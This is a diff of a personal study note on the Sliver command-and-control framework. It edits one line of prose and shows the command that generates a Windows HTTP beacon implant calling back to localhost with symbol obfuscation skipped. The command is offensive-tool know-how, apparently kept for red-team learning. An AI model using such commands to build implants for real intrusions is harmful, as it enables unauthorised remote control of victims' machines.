johntrigg/obsidian-notes/Atomic-Notes/4000-TOOLS/4100-OFFENSIVE-TOOLS/4200-Sliver-C2/4210-Sliver.md

 ## Generating Beacons
 There's a lot of factors.
-The below generates a beacon that is called 'http_beacon', is a windows executable,
+The below generates a beacon that is called 'http_beacon', is a windows executable, skips symbol obfuscation
 ```bash
 sliver > generate beacon help
 sliver > generate beacon --http 127.0.0.1 --skip-symbols -N http_beacon --os windows